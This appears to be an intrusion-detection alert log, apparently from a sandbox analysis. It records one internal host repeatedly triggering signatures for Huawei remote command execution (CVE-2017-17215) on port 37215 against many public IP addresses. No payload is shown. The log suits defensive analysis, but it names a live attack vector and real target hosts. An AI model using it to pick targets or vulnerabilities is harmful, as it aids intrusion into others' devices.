                                                    07/10/24-08:26:13.833960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815237215192.168.2.14157.187.187.237
                                                    07/10/24-08:26:15.879292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551637215192.168.2.1441.136.151.121
                                                    07/10/24-08:26:36.340754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327037215192.168.2.14135.177.94.174
                                                    07/10/24-08:26:43.526771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844637215192.168.2.14197.98.128.212
                                                    07/10/24-08:27:23.773863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963837215192.168.2.14197.232.7.196
                                                    07/10/24-08:27:08.421673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5750437215192.168.2.1466.192.138.219
                                                    07/10/24-08:26:17.985720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754237215192.168.2.1443.39.192.117
                                                    07/10/24-08:26:43.805226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120237215192.168.2.1441.141.36.110
                                                    07/10/24-08:26:38.630807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093837215192.168.2.14197.17.155.89
                                                    07/10/24-08:26:42.392755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335237215192.168.2.1441.91.33.83
                                                    07/10/24-08:26:33.161951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732637215192.168.2.14157.142.225.211
                                                    07/10/24-08:27:08.415369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776637215192.168.2.14197.92.9.190
                                                    07/10/24-08:26:25.449751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312037215192.168.2.1441.34.67.138
                                                    07/10/24-08:27:24.957397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556637215192.168.2.14197.159.211.133
                                                    07/10/24-08:26:15.809850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816237215192.168.2.14197.211.95.44
                                                    07/10/24-08:26:45.669176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108637215192.168.2.149.62.97.39
                                                    07/10/24-08:27:24.891273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332637215192.168.2.1441.76.16.195
                                                    07/10/24-08:26:47.949660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985037215192.168.2.14197.241.38.137
                                                    07/10/24-08:26:45.607531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599437215192.168.2.14197.100.5.109
                                                    07/10/24-08:26:47.857207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059037215192.168.2.14197.194.165.247
                                                    07/10/24-08:26:59.524945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4871237215192.168.2.14157.67.242.46
                                                    07/10/24-08:26:43.856431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039237215192.168.2.14197.141.19.96
                                                    07/10/24-08:27:33.934356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547037215192.168.2.14197.83.233.65
                                                    07/10/24-08:26:41.372745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051437215192.168.2.1441.177.10.113
                                                    07/10/24-08:27:23.781687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291237215192.168.2.14197.102.27.210
                                                    07/10/24-08:26:55.400410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968837215192.168.2.14197.4.6.136
                                                    07/10/24-08:27:23.831762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227637215192.168.2.14157.194.162.159
                                                    07/10/24-08:27:19.163941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117037215192.168.2.1441.211.244.63
                                                    07/10/24-08:27:08.422156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850637215192.168.2.14197.244.70.4
                                                    07/10/24-08:26:45.619153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082637215192.168.2.14197.118.6.4
                                                    07/10/24-08:26:28.878894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360237215192.168.2.14197.220.193.236
                                                    07/10/24-08:27:08.458105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540637215192.168.2.14197.88.49.31
                                                    07/10/24-08:26:36.392999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186237215192.168.2.14157.190.112.70
                                                    07/10/24-08:26:25.430749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406037215192.168.2.14197.125.110.149
                                                    07/10/24-08:26:49.798934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398237215192.168.2.1487.144.114.174
                                                    07/10/24-08:27:14.812772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664837215192.168.2.14196.199.136.229
                                                    07/10/24-08:26:13.700546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291037215192.168.2.14174.33.110.226
                                                    07/10/24-08:26:25.515269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640237215192.168.2.14197.25.3.236
                                                    07/10/24-08:27:24.932186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798637215192.168.2.14157.30.146.198
                                                    07/10/24-08:26:13.830759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783237215192.168.2.14157.41.198.23
                                                    07/10/24-08:27:27.136421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4648637215192.168.2.14197.197.42.174
                                                    07/10/24-08:26:55.405886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184837215192.168.2.1436.131.64.88
                                                    07/10/24-08:27:05.222461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714437215192.168.2.14197.165.221.186
                                                    07/10/24-08:26:31.092800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439837215192.168.2.14197.147.221.170
                                                    07/10/24-08:27:11.475374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883237215192.168.2.1441.191.155.127
                                                    07/10/24-08:26:33.247887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059637215192.168.2.14157.106.195.205
                                                    07/10/24-08:26:52.070871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355837215192.168.2.14157.82.224.44
                                                    07/10/24-08:26:20.159538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826837215192.168.2.1441.48.241.124
                                                    07/10/24-08:26:55.406931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473237215192.168.2.1441.109.24.151
                                                    07/10/24-08:26:43.663185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098237215192.168.2.1441.178.141.239
                                                    07/10/24-08:26:31.056183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022837215192.168.2.1450.216.24.85
                                                    07/10/24-08:27:20.476661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024837215192.168.2.14197.163.83.184
                                                    07/10/24-08:26:57.498447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764837215192.168.2.14157.189.143.107
                                                    07/10/24-08:27:13.850530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677037215192.168.2.14157.226.187.102
                                                    07/10/24-08:26:53.135907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597637215192.168.2.14148.157.182.16
                                                    07/10/24-08:26:55.366759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604237215192.168.2.1450.255.91.247
                                                    07/10/24-08:26:22.276470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381637215192.168.2.14197.210.53.160
                                                    07/10/24-08:26:47.920289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765837215192.168.2.1441.62.178.111
                                                    07/10/24-08:26:48.021339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454437215192.168.2.14197.163.227.246
                                                    07/10/24-08:27:05.197081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863437215192.168.2.1435.212.26.223
                                                    07/10/24-08:26:41.576208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038437215192.168.2.1441.71.73.33
                                                    07/10/24-08:26:17.984415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386837215192.168.2.14119.130.55.50
                                                    07/10/24-08:26:20.091176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410237215192.168.2.14134.255.122.198
                                                    07/10/24-08:26:45.594694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3796237215192.168.2.14197.239.237.112
                                                    07/10/24-08:27:02.973887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706837215192.168.2.1497.100.10.138
                                                    07/10/24-08:26:26.613103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372637215192.168.2.14197.218.198.186
                                                    07/10/24-08:27:11.520220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4475837215192.168.2.14197.239.18.80
                                                    07/10/24-08:26:59.560985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492237215192.168.2.14197.56.2.158
                                                    07/10/24-08:26:43.888378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123437215192.168.2.14197.163.107.215
                                                    07/10/24-08:27:28.179104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348837215192.168.2.14160.164.37.59
                                                    07/10/24-08:26:48.024550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.14157.169.65.236
                                                    07/10/24-08:27:19.329520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5645437215192.168.2.142.158.13.24
                                                    07/10/24-08:27:14.860796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507637215192.168.2.1419.126.167.26
                                                    07/10/24-08:27:07.290610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421037215192.168.2.14197.169.142.132
                                                    07/10/24-08:27:22.539034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912637215192.168.2.1441.115.43.223
                                                    07/10/24-08:26:28.758809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109237215192.168.2.1441.182.174.207
                                                    07/10/24-08:26:36.411505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899037215192.168.2.14197.167.23.230
                                                    07/10/24-08:26:36.425072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550237215192.168.2.14197.141.250.153
                                                    07/10/24-08:27:19.160645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564837215192.168.2.14197.142.209.196
                                                    07/10/24-08:26:47.914278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952237215192.168.2.14206.2.106.157
                                                    07/10/24-08:27:30.541025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516837215192.168.2.1491.130.171.206
                                                    07/10/24-08:27:02.759865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14197.166.186.38
                                                    07/10/24-08:27:02.720199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257837215192.168.2.1441.190.106.233
                                                    07/10/24-08:27:19.340443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110437215192.168.2.1441.195.224.186
                                                    07/10/24-08:27:13.985222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556637215192.168.2.14170.97.121.39
                                                    07/10/24-08:27:17.079393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738437215192.168.2.14157.137.72.21
                                                    07/10/24-08:27:19.303289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624037215192.168.2.14197.214.217.23
                                                    07/10/24-08:26:13.798574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449037215192.168.2.14102.43.49.175
                                                    07/10/24-08:26:49.853206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266037215192.168.2.14157.6.104.92
                                                    07/10/24-08:27:10.585951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381837215192.168.2.14197.205.201.253
                                                    07/10/24-08:26:29.775539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046037215192.168.2.14134.148.23.94
                                                    07/10/24-08:26:20.186455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770037215192.168.2.1441.151.231.252
                                                    07/10/24-08:27:33.965064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023437215192.168.2.14109.213.102.251
                                                    07/10/24-08:27:32.621614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604437215192.168.2.1496.153.197.252
                                                    07/10/24-08:27:07.364210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470837215192.168.2.14197.167.93.140
                                                    07/10/24-08:27:08.365317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055237215192.168.2.1441.138.119.236
                                                    07/10/24-08:26:25.442977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175837215192.168.2.14197.84.182.193
                                                    07/10/24-08:26:57.628977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636037215192.168.2.14157.245.171.143
                                                    07/10/24-08:26:29.837168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080837215192.168.2.14197.51.213.3
                                                    07/10/24-08:26:36.422019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181637215192.168.2.14157.23.78.198
                                                    07/10/24-08:27:07.288154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536237215192.168.2.1412.218.165.3
                                                    07/10/24-08:27:23.944387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804637215192.168.2.14192.212.38.93
                                                    07/10/24-08:27:22.767946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3307237215192.168.2.1441.105.22.102
                                                    07/10/24-08:27:23.962913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168637215192.168.2.14157.72.63.73
                                                    07/10/24-08:26:34.245550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854637215192.168.2.1441.38.242.117
                                                    07/10/24-08:27:28.079097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971237215192.168.2.14177.113.235.85
                                                    07/10/24-08:26:52.039541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629637215192.168.2.1441.163.82.204
                                                    07/10/24-08:27:23.452123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805437215192.168.2.14197.42.38.140
                                                    07/10/24-08:27:14.856622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644237215192.168.2.1439.54.191.184
                                                    07/10/24-08:27:32.593828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198437215192.168.2.14197.224.179.5
                                                    07/10/24-08:27:22.898943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.14157.51.17.174
                                                    07/10/24-08:26:25.481164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162237215192.168.2.1441.152.118.17
                                                    07/10/24-08:27:33.894187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716237215192.168.2.1441.193.110.62
                                                    07/10/24-08:26:14.828226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619237215192.168.2.14212.199.254.32
                                                    07/10/24-08:27:33.792052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844837215192.168.2.14197.135.34.143
                                                    07/10/24-08:26:17.948398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4394837215192.168.2.14157.28.239.66
                                                    07/10/24-08:26:28.789365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922637215192.168.2.14182.126.63.204
                                                    07/10/24-08:27:22.799861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5963037215192.168.2.1441.106.85.88
                                                    07/10/24-08:26:43.763647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019237215192.168.2.14151.8.133.181
                                                    07/10/24-08:26:57.641375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168837215192.168.2.14197.243.245.122
                                                    07/10/24-08:27:19.265818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892037215192.168.2.1441.73.188.228
                                                    07/10/24-08:27:00.477553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288437215192.168.2.14197.33.119.123
                                                    07/10/24-08:27:13.931040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280837215192.168.2.14157.108.242.20
                                                    07/10/24-08:27:32.538394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126037215192.168.2.1441.189.50.154
                                                    07/10/24-08:26:25.447222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205637215192.168.2.14157.3.189.124
                                                    07/10/24-08:26:43.901801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370037215192.168.2.14197.99.170.169
                                                    07/10/24-08:27:30.419826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414637215192.168.2.1441.59.54.173
                                                    07/10/24-08:27:32.490587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896837215192.168.2.1444.67.38.48
                                                    07/10/24-08:26:34.231574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4171437215192.168.2.1441.133.166.242
                                                    07/10/24-08:26:22.288558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460837215192.168.2.14197.37.147.22
                                                    07/10/24-08:26:42.426350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794037215192.168.2.14197.140.97.79
                                                    07/10/24-08:26:38.512743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825637215192.168.2.1441.31.242.168
                                                    07/10/24-08:26:29.865951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349037215192.168.2.14128.173.254.30
                                                    07/10/24-08:26:34.216588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803837215192.168.2.1441.107.238.177
                                                    07/10/24-08:27:20.437180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790437215192.168.2.14157.25.200.19
                                                    07/10/24-08:27:27.107165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070037215192.168.2.14197.79.249.78
                                                    07/10/24-08:27:22.903696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773237215192.168.2.14196.189.242.229
                                                    07/10/24-08:27:08.389316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5389237215192.168.2.14198.122.212.37
                                                    07/10/24-08:27:19.315486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113237215192.168.2.1468.221.96.246
                                                    07/10/24-08:26:43.784447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994637215192.168.2.14157.151.46.0
                                                    07/10/24-08:26:53.127595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689037215192.168.2.1441.67.88.139
                                                    07/10/24-08:27:32.566152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841637215192.168.2.14157.58.14.245
                                                    07/10/24-08:26:18.011298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103237215192.168.2.14197.228.233.129
                                                    07/10/24-08:26:31.076380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5448637215192.168.2.14157.62.149.224
                                                    07/10/24-08:26:53.186612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435037215192.168.2.1479.206.97.24
                                                    07/10/24-08:27:14.879278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363237215192.168.2.14197.43.155.250
                                                    07/10/24-08:26:43.873718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5569037215192.168.2.14197.198.126.41
                                                    07/10/24-08:26:29.848557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634837215192.168.2.14161.91.153.247
                                                    07/10/24-08:26:31.061438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566637215192.168.2.1454.206.33.31
                                                    07/10/24-08:27:31.489680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825037215192.168.2.14157.243.188.61
                                                    07/10/24-08:26:31.102149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499437215192.168.2.1472.51.80.71
                                                    07/10/24-08:27:07.329949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997037215192.168.2.14197.243.221.23
                                                    07/10/24-08:27:24.863618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14189.8.244.5
                                                    07/10/24-08:27:22.573004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382037215192.168.2.14157.92.58.216
                                                    07/10/24-08:26:26.589872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129237215192.168.2.14197.40.197.101
                                                    07/10/24-08:26:28.651021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131037215192.168.2.14145.148.24.153
                                                    07/10/24-08:27:10.699578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607837215192.168.2.14197.173.19.69
                                                    07/10/24-08:27:13.977821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312237215192.168.2.14197.133.117.37
                                                    07/10/24-08:27:14.829677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194037215192.168.2.1441.199.224.226
                                                    07/10/24-08:26:53.209025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287037215192.168.2.1441.190.26.46
                                                    07/10/24-08:26:49.900161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402437215192.168.2.14203.171.241.0
                                                    07/10/24-08:27:13.869693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576037215192.168.2.14219.212.245.161
                                                    07/10/24-08:27:19.271006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044037215192.168.2.1441.131.220.189
                                                    07/10/24-08:26:55.413827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4513837215192.168.2.1441.132.241.122
                                                    07/10/24-08:27:13.714524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694637215192.168.2.14197.4.144.211
                                                    07/10/24-08:27:32.596186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4858837215192.168.2.14160.118.48.1
                                                    07/10/24-08:26:36.420530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620037215192.168.2.14197.43.31.56
                                                    07/10/24-08:27:02.995809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898637215192.168.2.1441.254.248.237
                                                    07/10/24-08:26:18.025599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575637215192.168.2.14157.231.29.98
                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655437215192.168.2.1441.131.40.167
                                                    07/10/24-08:26:26.589872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862437215192.168.2.14157.176.249.141
                                                    07/10/24-08:26:55.462575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555637215192.168.2.1441.21.18.4
                                                    07/10/24-08:26:28.777569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545437215192.168.2.14157.91.192.20
                                                    07/10/24-08:27:23.931354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596037215192.168.2.1459.76.201.115
                                                    07/10/24-08:27:07.392939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465237215192.168.2.1495.170.235.204
                                                    07/10/24-08:26:28.754547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964237215192.168.2.1425.132.221.177
                                                    07/10/24-08:26:14.811760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938637215192.168.2.14157.163.200.243
                                                    07/10/24-08:26:57.655011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683037215192.168.2.14110.17.87.70
                                                    07/10/24-08:27:11.528287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551237215192.168.2.1462.238.180.159
                                                    07/10/24-08:27:20.414993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575037215192.168.2.1441.134.202.145
                                                    07/10/24-08:26:36.395697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060437215192.168.2.14216.6.246.66
                                                    07/10/24-08:26:28.868107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494437215192.168.2.14157.124.147.209
                                                    07/10/24-08:26:41.462322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4500237215192.168.2.14197.222.7.148
                                                    07/10/24-08:27:11.538749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460037215192.168.2.1423.246.29.225
                                                    07/10/24-08:27:02.993548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302637215192.168.2.1441.157.96.8
                                                    07/10/24-08:26:47.976688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645037215192.168.2.1441.58.178.203
